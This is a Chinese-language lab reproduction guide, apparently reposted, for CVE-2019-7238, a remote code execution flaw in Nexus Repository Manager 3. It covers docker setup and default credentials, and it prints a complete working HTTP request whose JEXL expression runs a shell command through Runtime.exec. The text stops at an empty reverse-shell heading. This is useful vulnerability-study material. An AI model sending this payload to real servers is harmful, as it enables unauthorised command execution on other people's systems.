Nexus Repository Manager 3 遠端命令執行漏洞(CVE-2019-7238)
阿新 • • 發佈:2022-05-17
Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.14.0及之前版本中,存在一處基於OrientDB自定義函式的任意JEXL表示式執行功能,而這處功能存在未授權訪問漏洞,將可以導致任意命令執行漏洞。
參考連結:
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
- https://xz.aliyun.com/t/4136
- https://www.anquanke.com/post/id/171116
- http://commons.apache.org/proper/commons-jexl/
環境搭建
執行如下命令啟動Nexus Repository Manager 3.14.0:
docker-compose up -d等待一段時間環境才能成功啟動,訪問http://your-ip:8081即可看到Web頁面。
使用賬號密碼admin:admin123登入後臺,然後在maven-releases下隨便上傳一個jar包:
觸發該漏洞,必須保證倉庫裡至少有一個包存在。
漏洞復現
介面沒有校驗許可權,所以直接傳送如下資料包,即可執行touch /tmp/success命令:
POST /service/extdirect HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 368 Connection: close
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
可見,/tmp/success已成功執行:
反彈Shell